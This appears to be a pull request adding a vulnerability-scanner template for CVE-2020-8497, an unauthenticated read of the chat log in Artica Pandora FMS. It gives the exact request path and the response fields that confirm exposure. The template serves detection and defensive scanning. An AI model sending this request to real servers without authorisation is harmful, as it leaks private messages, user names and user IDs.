### PR TITLE
Create CVE-2020-8497.yaml

### DIFF
--- a/cves/2020/CVE-2020-8497.yaml
+++ b/cves/2020/CVE-2020-8497.yaml
@@ -5,13 +5,15 @@ info:
   author: gy741
   severity: medium
   description: In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps.
-  reference: https://k4m1ll0.com/cve-2020-8497.html
-  tags: cve,cve2020,fms
+  reference:
+    - https://k4m1ll0.com/cve-2020-8497.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8497
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 5.30
     cve-id: CVE-2020-8497
     cwe-id: CWE-306
+  tags: cve,cve2020,fms
 
 requests:
   - method: GET
@@ -21,12 +23,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
-        words:
-          - "type"
-          - "id_user"
-          - "user_name"
-          - "text"
         part: body
+        words:
+          - '"type"'
+          - '"id_user"'
+          - '"user_name"'
+          - '"text"'
         condition: and
 
       - type: status

--- a/cves/2020/CVE-2020-8497.yaml
+++ b/cves/2020/CVE-2020-8497.yaml
@@ -1,0 +1,34 @@
+id: CVE-2020-8497
+
+info:
+  name: Artica Pandora FMS - Arbitrary File Read
+  author: gy741
+  severity: medium
+  description: In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps.
+  reference: https://k4m1ll0.com/cve-2020-8497.html
+  tags: cve,cve2020,fms
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.30
+    cve-id: CVE-2020-8497
+    cwe-id: CWE-306
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "type"
+          - "id_user"
+          - "user_name"
+          - "text"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

Hello

Added CVE-2020-8497

```
In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps.
```

- References: https://k4m1ll0.com/cve-2020-8497.html

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO
